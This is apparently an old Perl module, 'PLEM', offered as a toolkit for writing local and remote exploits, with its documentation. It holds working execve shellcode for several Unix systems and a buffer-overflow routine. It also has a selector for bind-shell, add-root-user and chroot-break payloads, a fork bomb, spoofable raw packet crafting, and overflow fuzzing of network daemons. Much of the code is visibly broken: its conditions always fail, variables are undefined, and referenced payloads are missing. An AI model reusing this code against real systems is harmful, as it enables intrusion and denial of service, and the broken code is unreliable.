##
#   PLEM 
#   Perl Loadable Exploiting Module 
#   Package plem::main
#   For more informations see : /doc/documentation 
#   http://www.blackangels.it
##


# Module's name
package main;


# External modules 
use IO::Socket;
use Net::FTP;
use Net::RawIP;
use plem::shell;


##
#   Global costants
##

# General constants
$binsh = "/bin/sh";
$binbash = "/bin/bash";
$nop = "\x90";
$maxbuffer = 1024;
$ok = 1;
$error = -1;

# Daemons parameters
$cd = "CD";
$put = "PUT";
$size = "SIZE";
$get = "GET";
$head = "HEAD";
$post = "POST";
$user = "USER";
$pass = "PASS";
$list = "LIST";
$retr = "RETR";
$top = "TOP";
$dele = "DELE";
$helo = "HELO"; 
$mailfrom = "MAIL FROM:";  
$rcptto = "RCPT TO:"; 
$data = "DATA:"; 
$vrfy = "VRFY"; 
$expn = "EXPN";
$http10 = "HTTP/1.0";
$http11 = "HTTP/1.1";

# Network constants
$localhost = "127.0.0.1";
$echo = 7;
$ftp = 21;
$ssh = 22;
$telnet = 23;
$smtp = 25;
$http = 80;
$pop = 110;


##
#   Functions
##


# Returns the specified error
sub errormsg
{
   my ($msg) = @_;
   if ($msg eq "") {
                      $msg = "\nUndefinied error ...\n\n";
                   }
   printf $msg;
   exit(1);
}


# Performs a HTTP HEAD request
sub getheader
{
   my ($host, $port, $request) = @_;
   if ($host eq "") {
                       $host = $localhost;
                    }
   if ($port eq "") { 
                       $port = $http;
                    }
   my $sockd = IO::Socket::INET->new (
                                        PeerAddr => $host,
                                        PeerPort => $port,
                                        Proto    => "tcp"
                                     ) || return $error && exit(1);

   if ($request eq "1") {
                           print $sockd "HEAD / HTTP/1.1\r\n\r\n";
                        }
   else { 
           print $sockd "HEAD / HTTP/1.0\r\n\r\n";
        }
   printf "\nServer HTTP response :\n\n";
   while (<$sockd>){print}
   close($sockd);
   exit(1);
}


# Generates a string of potential dangerous characters and returns it
sub badchar
{
   my ($char, $repeat) = @_;
   my $bc;
   if ($char eq "") {
                       $char = "A";
                    }
   elsif ($char ne "A%" && $char ne "%20" && $char ne "?" && $char ne "?A" && $char ne "?%") {
                                                                                                $char = "A";
                                                                                             }
   if ($repeat eq "") {
                         $repeat = $maxbuffer;
                      }
   $bc = $char x $repeat;
   return $bc;
   exit(1);
}


# Loads a TCP socket and connect it
sub connect
{
   my ($host, $port) = @_;
   if ($host eq "") {
                       $host = $localhost;
                    }
   if ($port eq "") { 
                       $port = $http;
                    }
   my $sockd = IO::Socket::INET->new (
                                        PeerAddr => $host,
                                        PeerPort => $port,
                                        Proto    => "tcp"
                                     ) || return $error && exit(1);
   close($sockd);
   return $ok;
   exit(1);
}


# Loads a TCP socket, connect it and sends data
sub sendtcp
{
   my ($host, $port, $string) = @_;
   if ($host eq "") {
                       $host = $localhost;
                    }
   if ($port eq "") { 
                       $port = $http;
                    }
   my $sockd = IO::Socket::INET->new (
                                        PeerAddr => $host,
                                        PeerPort => $port,
                                        Proto    => "tcp"
                                     ) || return $error && exit(1);
   print $sockd $string . "\r\n";
   close($sockd);
   return $ok;
   exit(1);
}


# Loads an UDP socket and sends data
sub sendudp
{
   my ($host, $port, $string) = @_;
   if ($host eq "") {
                       $host = $localhost;
                    }
   if ($port eq "") { 
                       $port = $http;
                    }
   my $sockd = IO::Socket::INET->new (
                                        PeerAddr => $host,
                                        PeerPort => $port,
                                        Proto    => "udp"
                                     ) || return $error && exit(1);
   print $sockd $string . "\r\n";
   return $ok;
   exit(1);
}


# Checks the parameter of a daemon, for possible overflow vulnerabilities
sub checksigsegv
{
   my ($host, $port, $daemon, $parameter, $string) = @_;
   if ($host eq "") {
                       $host = $localhost;
                    }
   if ($port eq "") { 
                       $port = $http;
                    }
   if ($daemon ne "http" || $daemon ne "ftp" || $daemon ne "smtp" || $daemon ne "pop") { 
                                                                                          errormsg("\nInvalid daemon $daemon. http will be used as default ...\n\n");
                                                                                          $daemon = "http";
                                                                                       }
   if ($parameter eq "") {
                            $parameter = $get;
                         }
   if ($string eq "") { 
                         $string = badchar("A", 1000);
                      }
   if ($daemon eq "http") {
                             if ($parameter ne $get || $parameter ne $head || $parameter ne $post) {
                                                                                                      errormsg("\nInvalid parameter $parameter. GET will be used as default ...\n\n");
                                                                                                      $parameter = $get;
                         }                                                                          }
   elsif ($daemon eq "pop") {
                               if ($parameter ne $user || $parameter ne $pass || $parameter ne $list || $parameter ne $retr || $parameter ne $top || $parameter ne $dele) {
                                                                                                                                                                             errormsg("\nInvalid parameter $parameter. USER will be used as default ...\n\n");
                                                                                                                                                                             $parameter = $user;
                            }                                                                                                                                              }
   elsif ($daemon eq "smtp") {
                                if ($parameter ne $helo || $parameter ne $mailfrom || $parameter ne $rcptto || $parameter ne $data || $parameter ne $vrfy || $parameter ne $expn) {
                                                                                                                                                                                     errormsg("\nInvalid parameter $parameter. HELO will be used as default ...\n\n");
                                                                                                                                                                                     $parameter = $helo;
                             }                                                                                                                                                    }                    

   elsif ($daemon eq "ftp") {
                               if ($parameter ne $user || $parameter ne $pass || $parameter ne $cd || $parameter ne $get || $parameter ne $put || $parameter ne $size) {
                                                                                                                                                                          errormsg("\nInvalid parameter $parameter. USER will be used as default ...\n\n");
                                                                                                                                                                          $parameter = $user;
                            }                                                                                                                                          }
   my $sockd = IO::Socket::INET->new (
                                        PeerAddr => $host,
                                        PeerPort => $port,
                                        Proto    => "tcp"
                                     ) || errormsg("\nUnable to connect to $host:$port ...\n\n") && exit(1);
   if ($port eq $http) { 
   print $sockd $parameter . " " . $string . " " . $http10 . "\r\n\r\n";
                       }
   else { 
   print $sockd $parameter . " " . $string . "\r\n\r\n";
        }
   close($sockd);
   my $sockd = IO::Socket::INET->new (
                                        PeerAddr => $host,
                                        PeerPort => $port,
                                        Proto    => "tcp"
                                     ) || return $error && exit(1);
   return $ok;
   exit(1);
}


# Generates child processes, that will execute a command
sub forkbomb
{
   my ($childs, $functiondad, $stringdad, $functionchild, $stringchild) = @_;
   my $process;
   my $i;
   if ($childs eq "") {
                         $childs = 100;
                      }
   if ($functiondad eq "") {
                              $function = "printf()";
                           }
   if ($stringdad eq "") {
                            $stringdad = "Father process ...";
                         }
   if ($functionchild eq "") {
                                $functionchild = "printf()";
                             }
   if ($stringchild eq "") {
                              $stringchild = "Child process ...";
                           }
   for($i=0;$i<$child;$i++) {
                              $process = fork();
                            } 
   if ($process==0) {
                       if ($functionchild ne "printf()" && $functionchild ne "exec()") {
                                                                                          errormsg("\nInvalid child function $functionchild. printf() will be used as default ...\n\n");
                                                                                          $functionchild = "printf()";
                                                                                       }
                       if ($functionchild eq "printf()") {
                                                            printf "$stringchild";
                                                         }
                       if ($functionchild eq "exec()") {
                                                          exec "$stringchild";
                                                       }
                       for($i=0;$i<$child;$i++) {
                                                   $process = fork();
                                                } 
                    }
   else {
           if ($functiondad ne "printf()" && $functiondad ne "exec()") {
                                                                          errormsg("\nInvalid dad function $functiondad. printf() will be used as default ...\n\n");
                                                                          $functiondad = "printf()";
                                                                       }
           if ($functiondad eq "printf()") {
                                              printf "$stringdad";
                                           }
           if ($functiondad eq "exec()") {
                                            exec "$stringdad";
                                         }
        }
  exit(1);
}


# Tryes to exploit local overflow vulnerabilities
sub localoverflow
{
   my ($location, $buffer, $offset, $retaddr, $os) = @_;
   my $shellcode;
   my $overbuffer;
   my $newret;
   my $i;
   if ($location eq "") {
                           $location = $binsh;
                        }
   if ($buffer eq "") { 
                         $buffer = $maxbuffer;
                      }
   if ($offset eq "") { 
                         $offset = 0;
                      }
   if ($os eq "") { 
                     $os = "linux";
                  }
   while ($retaddr eq "") { 
                             errormsg("\nNo return address set ...\n\n");
                             print "Please input a valid return address : ";
                             $retaddr = <STDIN>;
                             chomp $retaddr;
                          }
   if ($os ne "linux" && $os ne "bsd" && $os ne "hpux" && $os ne "unixware" && $os ne "irix" && $os ne "sco") {
                                                                                                                 errormsg("\nInvalid operative system $os. linux will be used as default ...\n\n");
                                                                                                                 $os = "linux";
                                                                                                              }
   elsif ($os eq "linux") {
                             $shellcode =
                             "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
                             "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
                             "\x80\xe8\xdc\xff\xff\xff/bin/sh";
                          }
   elsif ($os eq "bsd") {
                           $shellcode =
                           "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76" .
                           "\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b" .
                           "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff" .
                           "\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff" .
                           "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02" .
                           "\x02\x02\x02/bin/sh.-c.sh";
                        }
   elsif ($os eq "hpux") {
                            $shellcode =
                            "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40" .
                            "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe" .
                            "\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";
                         }
   elsif ($os eq "unixware") {
                                $shellcode =
                                "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4" .
                                "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf" .
                                "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff" .
                                "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53" .
                                "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f" .
                                "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";
                             } 
   elsif ($os eq "irix") {
                            $shellcode =
                            "\x04\x10\xff\xff\x24\x02\x03\xf3\x23\xff\x02\x14\x23\xe4\xfe" .
                            "\x08\x23\xe5\xfe\x10\xaf\xe4\xfe\x10\xaf\xe0\xfe\x14\xa3\xe0" .
                            "\xfe\x0f\x03\xff\xff\xcc/bin/sh";
                         }
   elsif ($os eq "sco") {
                           $shellcode =
                           "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" .
                           "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" .
                           "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
                        }
   for ($i = 0; $i < ($buffer - length($shellcode) - 100); $i++) {
                                                                    $overbuffer .= $nop;
                                                                 }
   $overbuffer .= $shellcode;
   print "\nUsing address : 0x", sprintf('%lx',($retaddr + $offset)), "\n";
   $newret = pack('l', ($retaddr + $offset));
   for ($i += length($shellcode); $i < $bsize; $i += 4) {
                                                           $overbuffer .= $newret;
                                                        }
   exec("$location $buffer"); 
   exit(1);
}


# Loads a TCP socket, connects it to a ftp server and execute login
sub ftplogin
{
   my ($host, $port, $user, $pass) = @_;
   if ($host eq "") {
                       $host = $localhost;
                    }
   if ($port eq "") { 
                       $port = $ftp;
                    }
   if ($user eq "") {
                       $user = "guest";
                    }
   if ($pass eq "") { 
                       $pass = "guest";
                    }
   my $ftp = Net::FTP->new($hostname,$port) || return $error && exit(1);
   $ftp->login($fuser, $fpass) || return $error && exit(1);
   $ftp->quit;
   return $ok;
   exit(1);
}


# Generates a TCP packet
sub tcppacket
{
   my ($shost, $sport, $dhost, $dport, $flag, $seq, $string, $delay, $packets) = @_;
   my $pack = new Net::RawIP;
   if ($shost eq "") {
                        $shost = $localhost;
                     }
   if ($dhost eq "") {
                        $dhost = $localhost;
                     }
   if ($sport eq "") {
                        $sport = $http;
                     }
   if ($dport eq "") {
                        $dport = $http;
                     }
   if ($flag eq "") {
                       $flag = "ack";
                    }
   if ($seq eq "") {
                      $seq = 10000000;
                   }
   if ($string eq "") {
                         $string = badchar("A", 10);
                      }
   if ($delay eq "") {
                        $delay = 0;
                     }
   if ($packets eq "") {
                          $packets = 1;
                       }
   if ($flag ne "ack" && $flag ne "rst") {
                                            errormsg("\nInvalid flag $flag. ack will be used as default ...\n\n");
                                            $flag = "ack";
                                         }
   if ($flag eq "ack") {
                          $pack->set ({
                                         ip => {  saddr => $shost,
                                                  daddr => $shost
                                               },
                                         tcp => {  source => $sport,
                                                   dest => $dport,
                                                   ack => 1,
                                                   seq => $seq,
                                                   data => '$string'
                                                }
                                     });
                       }
   elsif ($flag eq "rst") {
                             $pack->set ({
                                            ip => {  saddr => $shost,
                                                     daddr => $shost
                                                  },
                                            tcp => {  source => $sport,
                                                      dest => $dport,
                                                      rst => 1,
                                                      seq => $seq,
                                                      data => '$string'
                                                   }
                                        });
                          }  
   elsif ($flag eq "syn") {
                             $pack->set ({
                                            ip => {  saddr => $shost,
                                                     daddr => $shost
                                                  },
                                            tcp => {  source => $sport,
                                                      dest => $dport,
                                                      syn => 1,
                                                      seq => $seq,
                                                      data => '$string'
                                                   }
                                        });
                          } 
   elsif ($flag eq "psh") {
                             $pack->set ({
                                            ip => {  saddr => $shost,
                                                     daddr => $shost
                                                  },
                                            tcp => {  source => $sport,
                                                      dest => $dport,
                                                      psh => 1,
                                                      seq => $seq,
                                                      data => '$string'
                                                   }
                                        });
                          } 
   elsif ($flag eq "fin") {
                             $pack->set ({
                                            ip => {  saddr => $shost,
                                                     daddr => $shost
                                                  },
                                            tcp => {  source => $sport,
                                                      dest => $dport,
                                                      fin => 1,
                                                      seq => $seq,
                                                      data => '$string'
                                                   }
                                        });
                          } 
   elsif ($flag eq "urg") {
                             $pack->set ({
                                            ip => {  saddr => $shost,
                                                     daddr => $shost
                                                  },
                                            tcp => {  source => $sport,
                                                      dest => $dport,
                                                      urg => 1,
                                                      seq => $seq,
                                                      data => '$string'
                                                   }
                                        });
                          } 
   $pack->send($delay, $packets);
   exit(1);
}


# Generates a UDP packet
sub udppacket
{
   my ($shost, $sport, $dhost, $dport, $ttl, $string, $delay, $packets) = @_;
   my $pack = new Net::RawIP;
   if ($shost eq "") {
                        $shost = $localhost;
                     }
   if ($dhost eq "") {
                        $dhost = $localhost;
                     }
   if ($sport eq "") {
                        $sport = $http;
                     }
   if ($dport eq "") {
                        $dport = $http;
                     }
   if ($ttl eq "") {
                      $ttl = 128;
                   }
   if ($string eq "") {
                         $string = badchar("A", 10);
                      }
   if ($delay eq "") {
                        $delay = 0;
                     }
   if ($packets eq "") {
                          $packets = 1;
                       }
   $pack->set ({
                  ip => {  ttl => $ttl,
                           saddr => $shost,
                           daddr => $dhost
                        },
                  udp => {  source => $sport,
                            dest => $dport,
                            data => '$string'
                         }
              });
   $pack->send($delay, $packets);
   exit(1);
}


# Generates a ICMP packet
sub icmpppacket
{
   my ($shost, $dhost, $ttl, $type, $string, $delay, $packets) = @_;
   my $pack = new Net::RawIP;
   if ($shost eq "") {
                        $shost = $localhost;
                     }
   if ($dhost eq "") {
                        $dhost = $localhost;
                     }
   if ($ttl eq "") {
                      $ttl = 128;
                   }
   if ($type eq "") {
                       $type = 8;
                    }
   if ($string eq "") {
                         $string = badchar("A", 10);
                      }
   if ($delay eq "") {
                        $delay = 0;
                     }
   if ($packets eq "") {
                          $packets = 1;
                       }
   $pack->set ({
                  ip => {  ttl => $ttl,
                           saddr => $shost,
                           daddr => $dhost
                        },
                  icmp => {  type => $type,
                             data => $string
                          }
              });
   $pack->send($delay, $packets);
   exit(1);
}


# Loads a shellcode payload
sub shellcode
{
   my ($architecture, $os, $type) = @_;
   if ($architecture eq "") {
                               $architecture = "x86";
                            }
   if ($os eq "") {
                     $os = "linux";
                  }
   if ($type eq "") {
                       $type = "normal";
                    }
   if ($architecture ne "x86" && $architecture ne "sparc") {
                                                              errormsg("\nInvalid architecture $architecture. x86 will be used as default ...\n\n");
                                                              $architecture = "x86";
                                                           }
   if ($os ne "linux" && $os ne "windows" && $os ne "bsd" && $os ne "solaris") {
                                                                                  errormsg("\nInvalid operative system $os. linux will be used as default ...\n\n");
                                                                                  $os = "linux";
                                                                               }
   if ($type ne "normal" && $type ne "bind" && $type ne "adduser" && $type ne "chroot") {
                                                                                           errormsg("\nInvalid type $type. normal will be used as default ...\n\n");
                                                                                           $type = "normal";
                                                                                        }
   if ($architecture eq "x86") {
                                  if ($os eq "linux") {
                                                         if ($type eq "normal") {
                                                                                   print "\nUsing Linux x86 /bin/sh shellcode ...\n";
                                                                                   return $lnx_x86_binsh;
                                                                                }
                                                         elsif ($type eq "bind") {
                                                                                    print "\nUsing Linux x86 bind "5074" shellcode ...\n";
                                                                                    return $lnx_x86_bind;
                                                                                 }
                                                         elsif ($type eq "adduser") {
                                                                                       print "\nUsing Linux x86 adduser "z::0:0:::" shellcode ...\n";
                                                                                       return $lnx_x86_adduser;
                                                                                    }
                                                         elsif ($type eq "chroot") {
                                                                                      print "\nUsing Linux x86 break chroot shellcode ...\n";
                                                                                      return $lnx_x86_chroot;
                                                                                   }
                                                      }
                                  elsif ($os eq "bsd") {
                                                          if ($type eq "normal") {
                                                                                    print "\nUsing BSD x86 /bin/sh shellcode ...\n";
                                                                                    return $bsd_x86_binsh;
                                                                                 }
                                                          elsif ($type eq "bind") {
                                                                                     print "\nUsing BSD x86 bind "31337" shellcode ...\n";
                                                                                     return $bsd_x86_bind;
                                                                                  }
                                                          elsif ($type eq "adduser") {
                                                                                        print "\nUsing BSD x86 adduser shellcode ...\n";
                                                                                        return $bsd_x86_adduser;
                                                                                     }
                                                          elsif ($type eq "chroot") {
                                                                                       print "\nUsing BSD x86 break chroot shellcode ...\n";
                                                                                       return $bsd_x86_chroot;
                                                                                    }
                                                       }
                                  elsif ($os eq "solaris") {
                                                              if ($type eq "normal") {
                                                                                        print "\nUsing Solaris x86 /bin/sh shellcode ...\n";
                                                                                        return $sls_x86_binsh;
                                                                                     }
                                                              elsif ($type eq "bind") {
                                                                                         print "\nUsing Solaris x86 bind "30464" shellcode ...\n";
                                                                                         return $sls_x86_bind;
                                                                                      }
                                                              elsif ($type eq "adduser") {
                                                                                            print "\nUnable to use Solaris x86 adduser shellcode ...\n";
                                                                                            return $nop;
                                                                                         }
                                                              elsif ($type eq "chroot") {
                                                                                           print "\nUsing Solaris x86 break chroot shellcode ...\n";
                                                                                           return $sls_x86_chroot;
                                                                                        }
                                                           }
                                  elsif ($os eq "windows") {
                                                              if ($type eq "normal") {
                                                                                        print "\nUnable to use Windows x86 cmd shellcode ...\n";
                                                                                        return $nop;
                                                                                     }
                                                              elsif ($type eq "bind") {
                                                                                         print "\nUsing Windows x86 bind "58821" shellcode ...\n";
                                                                                         return $win_x86_bind;
                                                                                      }
                                                              elsif ($type eq "adduser") {
                                                                                            print "\nUsing Windows x86 adduser shellcode ...\n";
                                                                                            return $win_x86_adduser;
                                                                                         }
                                                              elsif ($type eq "chroot") {
                                                                                           print "\nUnable to use Windows x86 break chroot shellcode ...\n";
                                                                                           return $nop;
                                                                                        }
                                                           }
                               }
   elsif ($architecture eq "sparc") {
                                       if ($os eq "linux") {
                                                              if ($type eq "normal") {
                                                                                        print "\nUsing Linux SPARC /bin/sh shellcode ...\n";
                                                                                        return $lnx_sparc_binsh;
                                                                                     }
                                                              elsif ($type eq "bind") {
                                                                                         print "\nUsing Linux SPARC bind "8975" shellcode ...\n";
                                                                                         return $lnx_sparc_bind;
                                                                                      }
                                                              elsif ($type eq "adduser") {
                                                                                            print "\nUnable to use Linux SPARC adduser shellcode ...\n";
                                                                                            return $nop;
                                                                                         }
                                                              elsif ($type eq "chroot") {
                                                                                           print "\nUnable to use Linux SPARC break chroot shellcode ...\n";
                                                                                           return $nop;
                                                                                        }
                                                           }
                                       elsif ($os eq "bsd") {
                                                               if ($type eq "normal") {
                                                                                         print "\nUnable to use BSD SPARC /bin/sh shellcode ...\n";
                                                                                         return $nop;
                                                                                      }
                                                               elsif ($type eq "bind") {
                                                                                          print "\nUnable to use BSD SPARC bind shellcode ...\n";
                                                                                          return $nop;
                                                                                       }
                                                               elsif ($type eq "adduser") {
                                                                                             print "\nUsing BSD SPARC adduser shellcode ...\n";
                                                                                             return $nop;
                                                                                          }
                                                               elsif ($type eq "chroot") {
                                                                                            print "\nUsing BSD SPARC break chroot shellcode ...\n";
                                                                                            return $nop;
                                                                                         }
                                                            }
                                       elsif ($os eq "solaris") {
                                                                   if ($type eq "normal") {
                                                                                             print "\nUsing Solaris SPARC /bin/sh shellcode ...\n";
                                                                                             return $sls_sparc_binsh;
                                                                                          }
                                                                   elsif ($type eq "bind") {
                                                                                              print "\nUsing Solaris SPARC bind "6789" shellcode ...\n";
                                                                                              return $sls_sparc_bind;
                                                                                           }
                                                                   elsif ($type eq "adduser") {
                                                                                                 print "\nUnable to use Solaris SPARC adduser shellcode ...\n";
                                                                                                 return $nop;
                                                                                              }
                                                                   elsif ($type eq "chroot") {
                                                                                                print "\nUnable to use Solaris SPARC break chroot shellcode ...\n";
                                                                                                return $nop;
                                                                                             }
                                                                }
                                       elsif ($os eq "windows") {
                                                                   if ($type eq "normal") {
                                                                                             print "\nUnable to use Windows SPARC cmd shellcode ...\n";
                                                                                             return $nop;
                                                                                          }
                                                                   elsif ($type eq "bind") {
                                                                                              print "\nUnable to use Windows SPARC bind shellcode ...\n";
                                                                                              return $nop;
                                                                                           }
                                                                   elsif ($type eq "adduser") {
                                                                                                 print "\nUnable to use Windows SPARC adduser shellcode ...\n";
                                                                                                 return $nop;
                                                                                              }
                                                                   elsif ($type eq "chroot") {
                                                                                                print "\nUnable to use Windows SPARC break chroot shellcode ...\n";
                                                                                                return $nop;
                                                                                             }
                                                                }
                                   }
}



=head1 NAME

PLEM - Perl Loadable Exploiting Module


=head1 SYNOPSIS
    
use plem::main;                                # Include PLEM main library
function([parameters]);                        # Call a normal function
$var = retfunction([parameters]);              # Call a function and assign the returned value to a variable
              

=head1 DESCRIPTION

PLEM is an advanced Perl module, that provides a list of common function,
for an easy local and remote exploits development


=head1 FUNCTIONS

=over 3

=item getheader($host, $port, $request)

Performs a HTTP HEAD request to $host:$port ($localhost:$http set as default) and prints the returned server's header.
$request could be "0" for HTTP/1.0 requests (set as default) and "1" for HTTP/1.1 requests.
Returns "-1" on error.

=item errormsg($msg)

Returns the error specified in $msg and the line where the errormsg() function has been called.
If $msg is not specified, the program will returns an "Unidentified error ..." message.

=item shellcode($architecture, $os, $type)

Loads a shellcode payload, on the bases of the given architecture ("x86" set as default), operative system ("linux" 
set as default) and type ("normal" set as default).
$architecture could be "x86" (set as default) or "sparc".
$os could be "linux" (set as default), "windows", "bsd" and "solaris".
$type could be "normal" (set as default), "bind", "adduser" and "chroot".

=item badchar($char, $repeat)

Generates a string of potential dangerous characters and return it.
$char could be "A" (set as default), "A%", "%20", "?", "?A", "?%";
$repeat is the number of repetition inside the string, of the bad character ($maxbuffer value set as default).

=item connect($host, $port)

Loads a TCP socket and connect it to $host:$port ($localhost:$http set as default).
Returns "1" on success and "-1" on error.

=item sendtcp($host, $port, $string)

Loads a TCP socket, connect it to $host:$port ($localhost:$http set as default) and sends data $string.
Returns "1" on success and "-1" on error.

=item sendudp($host, $port, $string)

Loads an UDP socket and sends data $string to $host:$port ($localhost:$http set as default).
Returns "1" on success and "-1" on error.

=item checksigsegv($host, $port, $daemon, $parameter, $string)

Checks the parameter $parameter (GET set as default) of a daemon $daemon ($localhost:$http set as default), for 
possible overflow vulnerabilities, by sending it the string $string ("A" x 1000 as default).
$daemon could be "http"(set as default), "ftp", "smtp" and "pop".
Returns "1" on success and "-1" on overflow.

=item ftplogin($host, $port, $user, $pass)

Loads a TCP socket, connects it to a ftp server on $host:$port ($localhost:$http set as default) and execute the login
with username $user ("guest" set as default) and password $pass ("guest" set as default).
Returns "1" on success and "-1" on error.

=item forkbomb($child, $functiondad, $stringdad, $functionchild, $stringchild)

Generate $child child processes ("100" set as default), that will execute the function $functionchild ("printf()" 
set as default), with istructions $stringchild ("Child process ..." set as default) and the dad will excute the 
function $functiondad ("printf()" set as default), with istructions $stringdad ("Father process ..." set as default).
$functiondad and $functionchild could be "printf()" and "exec()".
$stringdad and $stringfunction are the parameter passed to the called function.

=item localoverflow($location, $buffer, $offset, $retaddr, $os)

Tryes to exploit local overflow vulnerabilities.
$location is program's location ($binsh set as default), $buffer is overflow's size ($maxbuffer set as default),
$offset is the offset ("0" set as default), $retaddr is the return address and $os is the operative system ("linux" 
set as default).
$os could be "linux" (set as default), "bsd", "hpux", "unixware", "irix" and "sco".

=item tcppacket($shost, $sport, $dhost, $dport, $flag, $seq, $string, $delay, $packets)
    
Generates a TCP packet, with source host $shost ($localhost set as default), destination host $dhost ($localhost 
set as default), source port $sport ($http set as default), destination port $dport ($http set as default), 
flag $flag ("ack" set as default), sequence number $seq ("10000000" set as default) and data $string ("A" x 10 set 
as default).
$flag could be "ack" (set as default), "rst", "syn", "psh", "fin" or "urg".
The function will send $packets packets ("1" set as default), with a delay of $delay ("0" set as default).

=item udppacket($shost, $sport, $dhost, $dport, $ttl, $string, $delay, $packets)
    
Generates an UDP packet, with with source host $shost ($localhost set as default), destination host $dhost 
($localhost set as default), source port $sport ($http set as default), destination port $dport ($http set as 
default), time to live $ttl ("128" set as default) and data $string ("A" x 10 set as default).
The function will send $packets packets ("1" set as default), with a delay of $delay ("0" set as default).

=item icmppacket($shost, $dhost, $ttl, $type, $string, $delay, $packets)

Generates an ICMP packet, with source host $shost ($localhost set as default), destination host $dhost ($localhost 
set as default), time to live $ttl ("128" set as default), type $type ("8" set as default) and data $string 
("A" x 10 set as default).
Types are the same used from NET::RawIP Perl module.
The function will send $packets packets ("1" set as default), with a delay of $delay ("0" set as default).

=back

=cut